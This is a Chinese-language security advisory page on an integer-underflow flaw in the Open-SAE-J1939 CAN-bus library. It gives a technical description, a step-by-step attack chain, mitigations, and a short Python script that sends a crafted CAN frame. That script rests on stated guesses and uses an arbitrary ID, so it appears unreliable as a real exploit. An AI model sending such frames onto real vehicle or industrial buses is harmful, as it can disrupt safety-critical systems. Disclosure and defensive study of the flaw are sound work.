CVE-2026-37534 CVSS 9.8 严重

CVE-2026-37534 Open-SAE-J1939整数下溢漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-37534

漏洞类型

整数下溢

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open-SAE-J1939

漏洞概述

Open-SAE-J1939是一款用于处理SAE J1939协议的开源库。该漏洞位于SAE_J1939_Read_Transport_Protocol_Data_Transfer函数中，源于整数下溢错误。攻击者可利用特制的CAN帧序列号触发此漏洞，从而实现任意内存写入。由于该漏洞无需认证且无交互要求，攻击者可通过网络远程利用，严重影响系统的机密性、完整性和可用性，可能导致任意代码执行或系统崩溃。

技术细节

该漏洞的根源在于Open-SAE-J1939库在处理传输协议数据传输（TP.DT）消息时，对序列号的验证逻辑存在缺陷。具体来说，在SAE_J1939_Read_Transport_Protocol_Data_Transfer函数中，当接收到CAN帧时，程序未正确检查序列号的范围。攻击者可以发送一个特定的序列号，导致计算过程中发生整数下溢。这种下溢会导致用于数据拷贝或缓冲区操作的索引值变为极大的数值，或者计算出错误的内存偏移量。由于程序随后使用该受污染的值作为内存写入的目标地址或长度，攻击者便能够控制写入的内存位置。这种任意内存写入能力允许攻击者覆盖关键的数据结构、函数指针或返回地址，进而绕过现有的安全防护机制，最终实现远程代码执行（RCE）或导致拒绝服务（DoS）。

攻击链分析

STEP 1

侦察与定位

攻击者识别目标系统使用Open-SAE-J1939库，并确定其连接的CAN总线接口。

STEP 2

构造恶意数据

攻击者编写脚本，构造包含特殊序列号的CAN数据帧，该序列号旨在触发整数下溢。

STEP 3

发送攻击报文

通过物理连接或网关向目标系统的CAN总线发送精心构造的恶意CAN帧。

STEP 4

触发漏洞

目标系统处理该帧时，SAE_J1939_Read_Transport_Protocol_Data_Transfer函数中的整数下溢被触发，导致计算出错误的内存地址。

STEP 5

执行写入与控制

利用计算出的错误地址进行任意内存写入，覆盖关键返回地址或函数指针，从而获取系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import can

# PoC for CVE-2026-37534: Integer Underflow in Open-SAE-J1939
# This script sends a crafted CAN frame to trigger the vulnerability.

def send_exploit_frame(interface='can0', arbitration_id=0x123):
    """
    Sends a malicious CAN frame with a crafted sequence number
    to trigger the integer underflow in SAE_J1939_Read_Transport_Protocol_Data_Transfer.
    """
    try:
        # Initialize the CAN bus interface
        bus = can.interface.Bus(channel=interface, bustype='socketcan')
        
        # Craft the payload
        # The vulnerability is triggered by a specific sequence number.
        # Example: Sending a sequence number that causes (Seq - 1) to underflow.
        # Assuming sequence number is in the first byte.
        data = [0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41] 
        
        # Create the message
        msg = can.Message(arbitration_id=arbitration_id, data=data, is_extended_id=False)
        
        # Send the message
        bus.send(msg)
        print(f"Exploit frame sent on {interface}: ID {hex(arbitration_id)}, Data {data}")
        
    except Exception as e:
        print(f"Error sending frame: {e}")

if __name__ == "__main__":
    send_exploit_frame()

影响范围

Open-SAE-J1939 <= commit b6caf884df46435e539b1ecbf92b6c29b345bdfe

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署CAN入侵检测系统（IDS），实时监控异常的序列号模式。同时，严格隔离CAN网络，确保只有可信的ECU或网关能够向受影响的系统发送数据传输协议消息。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表